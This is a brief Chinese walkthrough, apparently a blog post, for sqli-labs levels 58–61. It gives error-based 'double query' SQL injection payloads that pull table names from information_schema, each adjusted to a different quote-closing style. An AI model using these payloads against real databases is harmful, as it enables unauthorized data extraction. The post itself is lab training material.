美文网首页
sqli-labs level58-61 双查询注入

sqli-labs level58-61 双查询注入

作者: z1挂东南 | 来源:发表于2019-08-05 16:39 被阅读0次

    第五十八关

    双查询注入,单引号闭合,三个字段。
    ?id=1.1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),floor(rand(14)*2),0x7e)a from information_schema.tables group by a --+

    第五十九关

    整数型,不用闭合
    ?id=1 union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),floor(rand(14)*2),0x7e)a from information_schema.tables group by a --+

    第六十关

    单引号双引号括号闭合。
    ?id=1'") union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),floor(rand(14)*2),0x7e)a from information_schema.tables group by a --+

    第六十一关

    单引号括号括号闭合
    ?id=1')) union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),floor(rand(14)*2),0x7e)a from information_schema.tables group by a --+

    相关文章

      网友评论

          本文标题:sqli-labs level58-61 双查询注入

          本文链接:https://www.haomeiwen.com/subject/bfgmdctx.html